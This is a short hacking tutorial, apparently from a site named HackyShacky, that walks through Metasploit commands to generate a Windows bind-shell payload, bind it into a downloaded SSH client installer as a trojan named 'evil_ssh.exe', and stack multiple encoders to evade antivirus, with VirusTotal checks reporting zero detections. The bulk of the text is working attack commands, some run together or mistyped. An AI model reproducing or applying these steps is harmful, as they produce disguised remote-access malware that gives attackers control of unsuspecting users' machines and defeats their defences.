A Backtrack machine , real or virtual. I used Backtrack 5 r3, but other versions of Backtrack are working OK too !!!
We are using some harmless test files but don’t infect people with any real viruses that’s a Crime and we here at HackyShacky are not responsible for.
Antivirus protects machines from malware but not all of it .there are ways to pack malware to make it harder to detect. well use metasploit to render malware completely invisible to antivirus.
Creating a Listener:
This is a simple payload that gives the attacker remote control of a machine. It is not a virus ant won’t spread, but it is detected by antivirus engines. In Backtrack in a Terminal windows execute these commands:
msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exeYou should see the listen.exe file as shown below:
Analyzing the Listener with VirusTotal
Go to https://www.virustotal.com/en/
Encoding the Listener
wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exemsfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1
ls -l evil*
You should see the evil-ssh.exe file as shown below :
Scan with virusTOTAL
Go to: https://www.virustotal.com/
If you see a “File already analyzed” message, click the “View last analysis” button.
Encode the Listener Again This process will encode the listener with several different encodings.
msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1msfencode -i /root/listen2.exe -t raw -o
/root/listen3.exe -e x86/jmp_call_additive -c 1 msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1
msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1
ls -l listen*
The analysis shows that fewer of the antivirus engines detect the file now 0 out of 42 When I did it as shown below. you may see different numbers.